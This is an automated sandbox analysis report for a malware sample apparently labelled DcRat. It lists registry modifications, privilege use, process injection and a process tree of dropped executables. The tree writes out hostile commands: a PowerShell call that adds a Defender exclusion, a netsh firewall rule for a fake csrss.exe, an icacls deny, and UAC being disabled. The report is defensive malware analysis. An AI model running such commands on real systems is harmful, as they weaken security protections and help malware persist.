\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local 
Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. 
Australia Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. 
Australia Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob data elided] build2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data elided] csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 build2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob data elided] build2.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2460 PING.EXE 2416 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2328 a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe 2328 a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2328 a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 2956 installutil.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 2684 jK1HRDZ3A7KLdSimVOnZ4RqI.exe Token: SeImpersonatePrivilege 2684 jK1HRDZ3A7KLdSimVOnZ4RqI.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 2472 GIJECGDGCB.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeSystemEnvironmentPrivilege 1196 csrss.exe Token: SeDebugPrivilege 2536 powershell.EXE Token: SeShutdownPrivilege 820 explorer.exe Token: SeSecurityPrivilege 2712 sc.exe Token: SeSecurityPrivilege 2712 sc.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 2928 srWVeTGyzLkwwb1QBfnCcXzi.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1636 BroomSetup.exe 2796 rundll32.exe 2796 rundll32.exe 2796 rundll32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 1204 wrote to memory of 2664 1204 Process not Found 28
PID 1204 wrote to memory of 2664 1204 Process not Found 28
PID 1204 wrote to memory of 2664 1204 Process not Found 28
PID 2664 wrote to memory of 2472 2664 cmd.exe 30
PID 2664 wrote to memory of 2472 2664 cmd.exe 30
PID 2664 wrote to memory of 2472 2664 cmd.exe 30
PID 1204 wrote to memory of 2752 1204 Process not Found 31
PID 1204 wrote to memory of 2752 1204 Process not Found 31
PID 1204 wrote to memory of 2752 1204 Process not Found 31
PID 1204 wrote to memory of 2752 1204 Process not Found 31
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 2752 wrote to memory of 760 2752 7C14.exe 32
PID 760 wrote to memory of 2828 760 7C14.exe 34
PID 760 wrote to memory of 2828 760 7C14.exe 34
PID 760 wrote to memory of 2828 760 7C14.exe 34
PID 760 wrote to memory of 2828 760 7C14.exe 34
PID 760 wrote to memory of 2884 760 7C14.exe 35
PID 760 wrote to memory of 2884 760 7C14.exe 35
PID 760 wrote to memory of 2884 760 7C14.exe 35
PID 760 wrote to memory of 2884 760 7C14.exe 35
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 2884 wrote to memory of 1996 2884 7C14.exe 36
PID 1996 wrote to memory of 2244 1996 7C14.exe 38
PID 1996 wrote to memory of 2244 1996 7C14.exe 38
PID 1996 wrote to memory of 2244 1996 7C14.exe 38
PID 1996 wrote to memory of 2244 1996 7C14.exe 38
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 2244 wrote to memory of 1980 2244 build2.exe 39
PID 1980 wrote to memory of 568 1980 build2.exe 42
PID 1980 wrote to memory of 568 1980 build2.exe 42
PID 1980 wrote to memory of 568 1980 build2.exe 42
PID 1980 wrote to memory of 568 1980 build2.exe 42
PID 1204 wrote to memory of 1312 1204 Process not Found 45
PID 1204 wrote to memory of 1312 1204 Process not Found 45
PID 1204 wrote to memory of 1312 1204 Process not Found 45
PID 1204 wrote to memory of 1312 1204 Process not Found 45
PID 1204 wrote to memory of 2784 1204 Process not Found 46 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9091.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe"C:\Users\Admin\AppData\Local\Temp\a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe"1⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2328
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\6A47.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:2472
-
C:\Users\Admin\AppData\Local\Temp\7C14.exeC:\Users\Admin\AppData\Local\Temp\7C14.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Users\Admin\AppData\Local\Temp\7C14.exeC:\Users\Admin\AppData\Local\Temp\7C14.exe2⤵
- DcRat
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ec623f55-8e6c-4e0f-987d-fd54a5ff2c76" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:2828
-
C:\Users\Admin\AppData\Local\Temp\7C14.exe"C:\Users\Admin\AppData\Local\Temp\7C14.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\7C14.exe"C:\Users\Admin\AppData\Local\Temp\7C14.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\3b2e3c1f-37fe-4380-b3ae-513fb15e8165\build2.exe"C:\Users\Admin\AppData\Local\3b2e3c1f-37fe-4380-b3ae-513fb15e8165\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Users\Admin\AppData\Local\3b2e3c1f-37fe-4380-b3ae-513fb15e8165\build2.exe"C:\Users\Admin\AppData\Local\3b2e3c1f-37fe-4380-b3ae-513fb15e8165\build2.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 14207⤵
- Loads dropped DLL
- Program crash
PID:568
-
C:\Users\Admin\AppData\Local\Temp\D9A.exeC:\Users\Admin\AppData\Local\Temp\D9A.exe1⤵
- Executes dropped EXE
PID:1312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 1242⤵
- Loads dropped DLL
- Program crash
PID:2600
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\127B.bat" "1⤵PID:2784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:2608
-
C:\Users\Admin\AppData\Local\Temp\21B8.exeC:\Users\Admin\AppData\Local\Temp\21B8.exe1⤵
- Executes dropped EXE
PID:2740
-
C:\Users\Admin\AppData\Local\Temp\9091.exeC:\Users\Admin\AppData\Local\Temp\9091.exe1⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:2480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\9091.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵
- DcRat
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Users\Admin\Pictures\srWVeTGyzLkwwb1QBfnCcXzi.exe"C:\Users\Admin\Pictures\srWVeTGyzLkwwb1QBfnCcXzi.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:2928
-
C:\Users\Admin\Pictures\jK1HRDZ3A7KLdSimVOnZ4RqI.exe"C:\Users\Admin\Pictures\jK1HRDZ3A7KLdSimVOnZ4RqI.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Users\Admin\Pictures\jK1HRDZ3A7KLdSimVOnZ4RqI.exe"C:\Users\Admin\Pictures\jK1HRDZ3A7KLdSimVOnZ4RqI.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2752 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:1660
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2120
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1196 -
